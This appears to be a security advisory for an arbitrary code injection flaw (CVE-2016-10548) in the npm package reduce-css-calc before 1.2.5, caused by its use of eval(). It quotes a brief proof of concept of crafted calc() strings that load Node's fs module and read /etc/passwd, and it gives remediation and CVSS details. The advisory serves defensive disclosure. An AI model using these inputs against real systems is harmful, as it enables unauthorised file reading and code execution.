Arbitrary Code Injection

Affecting reduce-css-calc package, versions <1.2.5

Do your applications use this vulnerable package? Test your applications

Overview

reduce-css-calc is a package that reduces CSS calc() function to the maximum. Affected versions of the package used eval() for evaluation the expression, allowing the attacker to gain arbitrary code execution via specially crafted input.

Example

The issue was reported by ChALkeR and demonstrated by his example below:

const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));

Remediation

Upgrade reduce-css-calc version 1.2.5 or greater.

References

CVSS Score

10.0
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Changed
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Credit
Сковорода Никита Андреевич (ChALkeR)
CVE
CVE-2016-10548
CWE
CWE-94
Snyk ID
npm:reduce-css-calc:20160913
Disclosed
20 Aug, 2016
Published
17 Oct, 2016